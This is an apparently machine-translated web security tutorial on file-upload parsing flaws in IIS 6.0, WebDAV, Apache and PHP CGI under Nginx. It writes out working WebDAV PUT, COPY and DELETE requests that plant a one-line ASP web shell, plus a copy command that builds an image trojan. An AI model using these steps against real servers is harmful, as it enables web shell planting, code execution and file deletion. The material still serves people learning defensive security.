[Web Security] Upload Vulnerability Parsing vulnerability

Source: Internet
Author: User
Tags php script
One, IIS parsing vulnerabilities
1. When you create a folder in *.asa, *.asp format, any files in its directory will be parsed by IIS as an ASP file.
2. When the file is *.asp;1.jpg, IIS 6.0 is also executed as an ASP script.
Microsoft does not think this is a loophole, and has not introduced the IIS 6.0 patch, so the two "vulnerabilities" still exist.
3.WebDav Vulnerability (use of IIS Write permissions)

The first step is to use the HTTP method supported by the options probe server

Request:
options/http/1.1
Host:www.example.com


response:
...
public:options,trace,get,head,delete,put,post,copy,move,mkcol,propfind,proppatch,lock,unlock,search
...
The second step is to upload the script file to the server through the Put method

Request:
put/a.txt http/1.1
Host:www.example.com
content-length:30

<%eval request ("Chopper")%>
Step three, change the name by the move or copy method

Request:
copy/a.txt http/1.1
Host:www.example.com
destination:http://www.example.com/cmd.asp
Fourth step, using the Delete method, an attacker can also delete any file on the server

Request:
delete/a.txt http/1.1
Host:www.example.com

Second, the Apache Parsing vulnerability

In Apache 1.x and Apache 2.x, 1.php.rar is executed as a PHP file.
Apache has a principle for parsing files: When you encounter an extension that you do not know, you will parse it from the back until you meet the extension you know, and if you don't, you will expose your source code.

This approach bypasses blacklist-based checks.

The extension known as Apache is saved in the "/conf/mime.types" file under the installation directory. The following figure is the case for this machine, the file is C:\wamp\bin\apache\Apache2.2.21\conf\mime.types in the path



Third, PHP CGI parsing vulnerability
In some Web sites that use Nginx, access to http://www.xxser.com/1.jpg/1.php, the 1.jpg will be interpreted as PHP script, at this time 1.php does not exist.
This means that the attacker can upload a legitimate "picture" (Photo Trojan), and then add "/xxx.php" after the URL, you can get the site's Webshell.

This is not a nginx-specific vulnerability, and such parsing vulnerabilities often occur in web containers such as IIS7.0, IIS7.5, and lighttpd.

This parsing vulnerability is actually a PHP CGI vulnerability, and there is a key option in the PHP configuration file Cgi.fix_pathinfo is located in the local C:\wamp\bin\php\php5.3.10\ PHP.ini, the default is open, when the URL does not exist in the file, PHP will be recursively resolved forward.


Attach: Use copy command to make picture trojan: Copy 1.jpg/b+1.php/a 2.php (where/b means binary file,/A for ASCII file)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.